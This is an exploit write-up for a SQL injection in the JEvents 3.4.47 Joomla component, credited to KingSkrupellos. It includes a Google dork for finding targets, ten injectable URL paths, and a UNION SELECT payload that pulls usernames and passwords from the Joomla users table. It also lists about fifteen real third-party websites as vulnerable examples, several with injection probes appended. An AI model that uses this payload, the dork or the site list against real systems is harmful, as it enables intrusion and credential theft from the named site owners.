#################################################################### # Exploit Title : Joomla JEvents Components 3.4.47 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 31/01/2019 # Vendor Homepage : jevents.net # Software Download Link : jevents.net/download-area/jevents # Software Information Link : extensions.joomla.org/extension/jevents/ # Software Version : 3.4.47 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_jevents'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** JEvents is a well known and Loved Events Calendar / Management solution for Joomla. JEvents provides a full events and calendar solution for your Joomla! site. Showing your events in listings or as a visual monthly calendar view, create complex repeats patterns, import and export your events with a couple of clicks, offer a feed with your latest events. The JEvents calendar is translated into more than 40 languages so we are likely to have a translation for your website. JEvents offer Complex repeating event patterns, repeating event exceptions, importing and exporting of calendars, a sophisticated layout editor for event detail, event calendar, upcoming event list and even event creation pages. #################################################################### # Impact : ********** The JEvents 3.4.47 component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_jevents&Itemid=[SQL Injection] /index.php?option=com_jevents&task=month.calendar&Itemid=[SQL Injection] /index.php?option=com_jevents&task=modlatest.rss&format= feed&type=rss&Itemid=0&modid=[SQL Injection] /index.php?option=com_jevents&task=month.calendar&year= [YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=[SQL Injection] /index.php?option=com_jevents&task=year.listevents&day= [DAY]&month=[MONTH]&year=[YEAR]&Itemid=0 /index.php?option=com_jevents&task=month.calendar&Itemid= [ID-NUMBER]&year=[YEAR]&month=[MONTH]&day=[DAY][SQL Injection] /index.php?option=com_jevents&task=icalrepeat.detail&evid= [ID-NUMBER]&Itemid=[ID-NUMBER]&year=[YEAR]&month= [MONTH]&day=[DAY][SQL Injection] /index.php?option=com_jevents&task=cat.listevents&year= [YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop= [ID-NUMBER]&tmpl=component&limitstart=[SQL Injection] /component/jevents/day.listevents/[YEAR]/[MONTH]/[DAY] /index.php?option=com_jevents&task=month.calendar&catids= [ID-NUMBER]&month=[MONTH]&year=[YEAR]&Itemid=[SQL Injection] # Example Exploit Payload : ************************ union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users-- #################################################################### # Example Vulnerable Sites : ************************* [+] thurstancollege.net/index.php?option=com_jevents&Itemid=1%27 [+] priorsfordprimary.com/Joomla/index.php?option=com_jevents&task= modlatest.rss&format=feed&type=rss&Itemid=0&modid=0%27 [+] hortonwine.com/index.php?option=com_jevents&task= month.calendar&year=1948&month=02&day=01&Itemid=0&pop=1%27 [+] pohodart.cz/index.php?option=com_jevents&task= year.listevents&day=27&month=02&year=2019&Itemid=0 [+] allureparrucchieri.it/index.php?option=com_jevents&task= month.calendar&year=2018&month=07&day=22&Itemid=68&pop=1%27 [+] chlcourse.com/software/index.php?option=com_jevents&task= month.calendar&year=2019&month=04&day=19&Itemid=0&pop=1%27 [+] horizonschildrenscentre.ca/index.php?option=com_jevents&task= month.calendar&Itemid=0&year=2011&month=04&day=25 [+] spider.awardspace.info/index.php?option=com_jevents&task= month.calendar&Itemid=18 [+] shannondelany.com/joomla/index.php?option=com_jevents&task= icalrepeat.detail&evid=12&Itemid=75&year=2011&month=08&day=27%27 [+] arpege.musicanet.org/component/jevents/day.listevents/2018/08/11 /index.php?option=com_jevents&task=month.calendar&catids= 62&month=02&year=2021&Itemid=0 [+] neu.oaseczk.de/index.php?option=com_jevents&task= cat.listevents&year=2018&month=07&day=24&Itemid= 168&pop=1&tmpl=component&limitstart=150 [+] s437716437.onlinehome.us/index.php?option=com_jevents &task=modlatest.rss&format=feed&type=atom&Itemid=101&modid=0 [+] 2injoy.com/index.php?option=com_jevents&view=cat&layout=listevents&Itemid=144 [+] sportverein-beuren.de/index.php?option=com_jevents &task=year.listevents&Itemid=72&year=2012&month=03&day=02 #################################################################### # Example SQL Database Error : **************************** Strict Standards: Only variables should be assigned by reference in /home/priosfor/public_html/Joomla/plugins/system/k2/k2.php on line 278 Deprecated: Assigning the return value of new by reference is deprecated in /home/hortonwi/public_html/components/com_jevents/libraries/helper.php on line 119 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################